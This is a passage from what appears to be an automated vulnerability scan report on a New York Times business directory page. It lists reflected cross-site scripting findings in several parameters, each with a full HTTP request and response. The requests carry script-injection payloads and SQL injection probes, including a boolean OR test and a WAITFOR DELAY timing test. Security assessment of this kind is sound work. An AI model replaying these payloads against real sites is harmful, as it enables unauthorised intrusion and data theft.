c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:21:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91505
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=NGLKNADAEAJJMFFMIBBJIILP; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="DOrder" value="A56313"><script>alert(1)</script>b12c9d365d01799f3">
...[SNIP]...

4.193. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [DOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the DOrder request parameter is copied into the HTML document as plain text between tags. The payload d289f<script>alert(1)</script>7dd8a52e41d was submitted in the DOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c8
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=Ad289f<script>alert(1)</script>7dd8a52e41d&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80
...[SNIP]...

4.194. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the HTML document as plain text between tags. The payload bd930<script>alert(1)</script>3775acfcd22 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSt
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3bd930<script>alert(1)</script>3775acfcd22&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strSta
...[SNIP]...

4.195. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91575
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=EGIPGLGAIAMPEJGKBOKNFMCK; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="GroupId" value="ea4e4"><script>alert(1)</script>a8ffb7b062cca42c9">
...[SNIP]...

4.196. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between tags. The payload e36a7<script>alert(1)</script>44c7cfaf6039b697a was submitted in the KeyWord parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--e36a7<script>alert(1)</script>44c7cfaf6039b697a&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-
...[SNIP]...

4.197. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [KeyWord parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the KeyWord request parameter is copied into the HTML document as plain text between